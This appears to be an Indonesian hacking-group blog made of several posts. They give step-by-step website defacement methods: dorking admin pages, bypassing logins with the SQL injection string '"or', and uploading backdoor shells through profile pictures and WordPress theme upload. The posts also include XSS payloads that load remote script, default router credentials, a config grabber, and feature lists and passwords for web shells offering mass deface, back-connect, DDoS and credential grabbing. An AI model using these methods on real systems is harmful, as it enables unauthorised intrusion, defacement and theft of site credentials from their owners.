Advertisement

Tuesday, August 15, 2017

Tutorial deface dengan bypass admin

 
Bypass admin login Ok gan hello pa kabar?,baik lah y OK! , Entri gw kali ini mau share tutor deface pake metode Bypass Admin Login yang belakanganan ini sering gw pake..

Kuylah  langsung aja tutornya'.,')/

1.Dorking admin page buat kita bypass


inurl:/administrator/login.php  < < dork yang saya pake
inurl:/admin/login.php
inurl:/admin/dashboard.php  "Welcome"

dork simple ginimah sisahnya kembangin aja ok B-)

2
.Pilih target kalian sesuai dork , sampe kalian masuk ke page admin login'<'


3.Setelah masuk ke page admin login'-')/ , isi username & password dengan  '="or'

(Jika websitenya vuln , maka kita akan masuk ke DASHBOARD adminya)





4.Contohnya gini kalo vuln,setelah itu kalian bisa cari uploader buat upload backdoor kalian,biasanya di banner,slider,logo atau apalah :"
                         

                                 Kalo saya upload shell di gallery + bypass ext shellnya  ^o^

Setelah itumah bebas mau kalian apakan websitenya'-')/



        Dah sekian dulu Entri dari sy gan , wassalam!



           

Tuesday, June 27, 2017

XSS Vuln Google Translate

XSS Vuln Google Translate

Jangan Bully Yo Cuman Noob

Kode :

<Img src = "Link Image mu"
onload = "alert (" W0t ")"> </ img>
<Marquee> <h1> Kata - Kata mu </ h1> </ marquee>
<Script> alert (document.domain) </ script>
    <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)>

simpan kode dengan ext txt

Bukak Web Google Translate
[*] https://translate.google.com.br
or
[*] https://translate.google.com
Klik tulisan translate a document.
Terus Upload Kode XSS Tadi Habis Itu Klik Translate :'v

Gambar :
19496279_458354567864950_1336230454_o.thumb.png.92d87ea98abd0bdb66af8cfcda8de9f4.png 0

Copyright : Mr.Hydra

Sumber : http://www.tikuspintar.ga/2017/06/xss-vuln-google-translate.html

Tuesday, June 20, 2017

Default User/Pass Modem Router ZTE F609

Image result for Bypass Login

Hallo guys kali ini saya akan membagikan sedikit trik yaitu Default User dan Pass Modem Router ZTE F609, mau tau gmana caranya? Cekidot ~>
Pertama buka dulu halaman Login Router nya yaitu di 192.168.1.1
Selanjut nya akan muncul halaman login seperti di bawah ini
Kemudian masukan Default User dan Pass nya yaitu:
Username: user
 Password: user
Seperti dibawah ini!
Kemudian tekan "Login" dan HUBLAA! anda telah masuk kedalam Dashboard Router nya!

Oke sekian Tutorial dari saya dan Terima Kasih;)
-0by7es



Friday, June 2, 2017

Tools admin finder - Python script

 
Hola~ welcome back sama el,berhubung ini bulan puasa el dan segenap Member XaiSyndicate Team mengucapkan "Selamat Menjalankan Ibadah Puasa" bagi yg menjalankan -/\-
Di postingan gw kali ini,gw mau share tools admin finder

Bahan bahan disini cuk~

Script admin findernye
Wordlist admin pagenye

Oke ya mungkin semoga membantu buat Player SQL yg kadang bingung buat find adminya..

klw bingung cara pakenya,bisa liat vidionya disini :v jangan lupa buat like & subscribe >:(
Here~

Thank's to XaiSyndicate - spesial thank's to
AZZATSSINS yg bikin script ini :'v

Sekian buat Entri gua kali ini ~ wassallam


Wednesday, May 17, 2017

Paket Murah Indosat 1.2GB hanya 10rb

Image result for Paket Internet

Hallo guys kali ini gw mau bagi trik tentang Harga Murah Paket Indosat 1.2GB dengan harga 10rb :)


Jika ada yg tdk di mengerti jgn tkut utk langsung menanyakan kepada sang pembuat tutor -> Arifin
oke dan jgn lupa Like,Comment,and Subscribe terus biar dpet trik dan tips seputar Teknologi :)

Monday, May 15, 2017

Tutorial deface dengan register member upload shell

 
Yuhuuu wazzzupp'.')/ salken gw el,kali ini gua bakalan ngasih tutorial deface dengan register member upload shell,menurut gw ini cara deface yg simple xd karna memanfaatkan tempat uploader foto untuk meng-upload Backdoor,tapi kadang harus pake metode tamper,- atau bypass ext:*

Kuy langsung aja intip tutorialnya

1.Dorking cari pacar ,, target lah
dork:
inurl:media.php?module=daftar
inurl:register.html intext:Pendaftaran Pengguna

(kembangin lagi pake otak nekepoi kalian xd)

2.Register/Daftar


3.Setelah register/daftar ntar user sama passwordnya keliatan,next step LOGIN,pake user&pw yg udah di di sediakan,setelah register tadi'.')/





4.setelah login^ klw el upload shell pada uploader  pict di profil user, +bypass shell.php.xxxjpg trus klik kanan > lihat gambar

5.Done xdxdxd ,, tinggal kalian anuin'.')/ *nb klw mau tebas index usahakan back up mz :'")


Okay tq , cukup sekian tutor dari el kali ini,mohon di maafkan jika ada kekurangan atau kesalahanya^^ TERIMAKASIH














Friday, February 3, 2017

XaiSyndicate Toolers


Hallo gaes :v w penulis baru di blog ini :v
skarang w mau post tntang kumpulan Tools/Alat untuk memudah kan ngeDepes website :)
Cekidot -> http://xaisyndicate.tech/ <-
Tools nya:
-Defacer.ID Mass Notify
-Zone-H.org Mass Notify
-Bing Grabber
-CSRF Exploiter
-Admin Finder
-Drupal Mass Exploiter
-Brute Force Wordpress
-Revslider Mass Exploiter
*Tools yg lain masih akan di tambahkan ^_^ Have Nice Day :)

-Mr.7z-


Friday, January 13, 2017

Tutorial Crack WHM Dari Access Hash Menggunakan Modify Header

 
Post gw sekarang yaitu tutorial Crack WHM Dari Acces-Hash
bahan bahan yang harus lu sediain yaitu  :
Modify Header
download di sini
buat tutorial nya simak yuk di yutub nya  :v cekidot

Ini Coeg

sekian dari gue :v wasalam :v

Tuesday, January 3, 2017

Tutorial Menggunakan vHost Config Grabber

 
 Xai Syndicate Team - Tutorial Menggunakan vHost (Virtual Host) Config Grabber 

Bahan :
vHost (Virtual Host) config grabber : klik here
code asli buatan : Fallaga Gassrini
save di notepad dengan extensi .php
Di vHost Config Grabber Telah Saya Tambahkan :
- Magento
- Opencart
- Prestashop
- SiteLock
- Ellislab
- Lokomedia
- Dan Lain"

Oke Langsung Saja :D

Langkah - Langkah Nya :

1. Upload File vHost Config Grabber Yg saya bagikan di atas
2. Buka File Yg Baru Agan Upload Tadi :) Dan klik "Click ini Gan"

3. Setelah Itu klik "Klik ini"


4. Lalu Click xaivhost.cin


5. Setelah Itu Tinggal Buka Lagi xaivhost dan taraa




Sekian Dan Terima Kasih Dari Saya :*

Vidio : click here

Greetz : All Member Xai Syndicate


Friday, December 9, 2016

NoName Shell Release

 
Fitur :

- Mass Tools :
 - Mass Deface 1 Dir
 - Mass Deface All Dir
 - Sabun Massal Di Tempat
 - Sabun Massal Bunuh Diri
 - Mass Delete Files
- Config :
 -> Voodoo CMS [updated]
 -> Wordpress
 -> Joomla
 -> Drupal
 -> Magento
 -> Ellislab Devteam [CI]
 -> Opencart
 -> Prestashop
 -> phpBB
 -> Lokomedia
 -> Sitelook
 -> Bosweb
 -> WHMCS
 -> Cpanel
- Config V.2 :
 Apa bila Config yg 1 nya error ... bisa menggunakan config v.2 ini

- SymConfig :
 Grabb Config Dari Symlink ... jadi ngak usah cpek" cari 1 1 config di symlink ... tinggal symconfig sadjah langsung kena
- Jumping [error fixed] :
 Kelebihannyaa bisa langsung ambil nama domainnyaa 
- K-RDP Shell
 -> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
- CPanel/FTP Auto Deface: [ updated ]
 -> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp sajatidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
- Zone - H :
 Mass Notify hasil deface ke zone-h.org
- Defacer.id :
 Mass Notify hasil deface ke defacer.id
- Bypass vHost :
 Buat symlink apa bila kgk bisa di symlink :v :V
- Auto Edit User :
 Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
 Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.
- Auto Deface Wordpress
- Auto Deface Wordpress V.2
- Auto Edit Title Wordpress
- Encode/Decode :
Untuk Encode Atau Decode Script
- vB Index Changer
Multi Config
- DB Dump
 Database Dump ... untuk mengambil db
- Inject Code
- Bypass Etc/Passw
 Bypass ini biasa di gunakan untuk grabb config ... bisa menggunakan config v.2
- CSRF Exploiter
- Wp Auto Hijack
- CGI Telnet
- Adminer
 Untuk Login ke database
- Fake Root
- DDoS
- HashID
 mencari indentitas dari suatu hash
- Reverse IP
- Admin Finder [Fix Error]
- WHMCS Decoder
- Hash Generate
 Untuk Membuat Hash dari Mulai md5,md4,md6 with salt,MD5 with Salt & Sha1 ,sha1,sha256,sha1 with salt, sha1 with salt & md5
- Port Scanner
 Mencari port yg terbuka
- Domains Viewer
 mencari domain dalam satu server
- Back Connect [ updated ]
- Back Connect V.2
- Disable Functions
mendisable fungsi yg enable menggunakan php.ini dan .htaccess
- NginDexer 
auto deface wordpress dan joomla
- BruteForce Twitter

Default Password :
zeeblax
Downloads : - Klik
                    - Klik (Mini Size) < - Apa Bila Blank Saat Di Upload berarti site nya ngak support file_get_content

Terimakasih Dan Have A Coli Day

Friday, December 2, 2016

3RR0R V.2 Shell Backdoor Release

 
JembudParanoit - 3RR0R V.2 Shell BackDoor Has Been Release

Fitur :

  • Mass Deface ( 1 dir , all dir , sabun massal biasa , sabun massal bundir) ( Mass Delete )
  • Config ( Grabber Config )
  • SymConfig ( Symlink Config ) ( Home - Home10 )
  • Jumping ( Tengok Kamar Sebelah )
  • Cpanel Crack ( Auto Crack Dari Config )
  • SMTP Grabber ( Auto Grabber Dari Config ) ( Joomla )
  • Decode/Encode ( Encode / Decode Script )
  • Joomla Auto Edit User ( Auto Edit User Dari Config / Database ) ( Joomla )
  • Bypass vHost
  • Fake Root
  • vB Index Changer
  • Log Hunter ( Mencari Log Dari File" / Folder" Yg Berada Di Folder Tertentu )
  • Config Fucker
  • K-RDP Shell ( Creat RDP / Remote Desktop Protocol ) ( For Shell Windows )
  • Network / BackConnect ( Untuk Backconnect ) ( Kebutuhan Root Server )
  • Config Grabber ( Config Grabber V.2 )
  • CSRF Exploiter
  • Sqli Scan
  • BruteForce Twitter
  • Auto Edit User ( Mengganti User Dan Password Cms Tertentu Dari Database )
  • Auto Edit Title Wordpress ( Mengganti Title Dari CMS Wordpress )
  • Wordpress Auto Deface
  • Wordpress Auto Deface V.2
  • Joomla Server Scanner ( Server Scanner From IP ) ( Joomla )
  • Cpanel/FTP Auto Deface ( Auto Deface Website Menggunakan Login Cpanel )
  • CMS Detector
  • Port Scanner ( Untuk Mencari Port Yg Terbuka )
  • Symlink
  • Symlink V.2 ( Dilengkapi Bypass )
  • Zone-h ( Mass Notify )
  • Defacer.id ( Mass Notify )
  • CGI Telnet
  • Whois
  • Adminer ( Untuk Login Ke Database )
  • DDOS
  • HashID ( Untuk Mencari Hash Type )
  • Database Dump
  • Auto Exploiter Lokomedia
  • Wordpress Auto Edit User V.2
  • WHMCS Password Decode
  • Bypass Etc/Passw
  • Admin Finder
  • Wp Auto Hijack
  • WHMCS Decoder V.2
  • Multi Index Changer
  • Multi Config
  • Inject Code
  • Reverse IP
  • Multi Reset Password
  • Hash Generate ( Untuk Membuat Type Hash )
Default Password : rintoar2234
Download Link :
- Disini
- Disini ( Mini Size ) ( Kalo Website Nya Kgk Support File_get_content balakalan blank )


Terima Kasih Dan Have Fun :*

Tuesday, November 29, 2016

Cara Upload Shell Di CMS Wordpress Menggunakan Themes

 
JembudParanoit - Cara Bypass Upload Shell Di Wordpress CMS. Kadang gw galau klo pass dah login ke admin login kgk bisa upload shell di plugins :( tapi setelah saya ubrak abrik :v ehh ternyata bisa :v menggunakan themes hnya dengan upload file langsung :* yok tanpa basa" kita langsung sadjah :*

Syarat : 

1. Sudah tau admin user | password

Langkah - Langkahnya Beib :
1. Login ke admin Wordpress dengan mengetik /wp-admin  /  /wp-login.php di belakang url korban example site.co.li/wp-admin  /  site.co.li/wp-login.php
2. Kemudian Isikan Form Login dengan menggunakan user dan password yg agan ketahui

3. Setelah masuk ke Dashboard sekarang ketikan  /wp-admin/theme-install.php?upload di belakang url korban example : site.co.li/wp-admin/theme-install.php?upload


4. Setelah langkah Di atas tinggal upload shell agan


5. apabila ada bacaan 
Unpacking the package…
The package could not be installed. PCLZIP_ERR_BAD_FORMAT (-10) : Unable to find End of Central Dir Record signature

berarti agan berhasil 
6. Tinggal Masuk Ke Shell Nya
site.com/wp-content/uploads/tahun/bulan/shell.php
site.com/wp-content/uploads/shell.php
site.com/wp-content/uploads/tahun/shell.php

Seterah Dah mw di apain :*
terimakasih dan sekian :v

Friday, October 28, 2016

J3MB0D404 Shell Backdoor Released

 
Tampilan Login :
Tampilan Sesudah Login:


Shell Name : J3MB0D404
Mode : Glow Effect
Fitur
 :
- Mass Mass Mass'an (Mass Deface 1 Dir, Mass Deface All Dir , Mass Delete , Mass Delete All Dir , Sabun Massal Di Tempat DLL)
- Config (Auto Grabber Cofig Web)(Voodoo CMS [updated] , Wordpress, Joomla, Drupal, Magento, Ellislab Devteam [CI], Opencart, Prestashop, phpBB, Lokomedia, Bosweb, WHMCS, Cpanel)
- Jumping (With Domain)
- Zone-H Mass Poster
- Defacer ID Mass Poster
- CGI Telnet
- Cpanel Crack
- SMTP Grabber
- Encode / Decode
- Bypass Vhost
- CMS Detector
- Tool's port Scanner
- Symlink
- VB Index Changer
- Whois
- Adminer
- Database Dump
- Fake Root
- Auto Edit User
- Auto Edit Title Wordpress
- Wordpress Auto Deface
- Wodpress Auto Deface V2
- Bypass Etc/Password
- Log Hunter
- Shell Checker (By Cr1p's)
- Config Fucker
- Cpanel/Ftp Auto Deface
- K-Rdp Shell
- Network / BackConnect
- Config Grabber ( Apabila Config Di Atas Error )
- Auto Exploiter Lokomedia
- CSRF Exploiter
- WHMCS Password Decoder
- BruteForce Twitter
- Symlink 2 Dilengkapi Bypass Symlink
- Joomla Auto Edit User
- Wordpress Auto Edit User V.2
- WP - Auto - Hijack
- Dorking Tools
- Bing Grabber
- HashID
- Admin Finder
- IpLookUp
- Prestashop Exploiter
- Magento Exploiter
- DDOS
- Sql Scan (Error)(Blm Gw Perbaiki)
- Joomla Server Scanner 

COMOT : Klik Here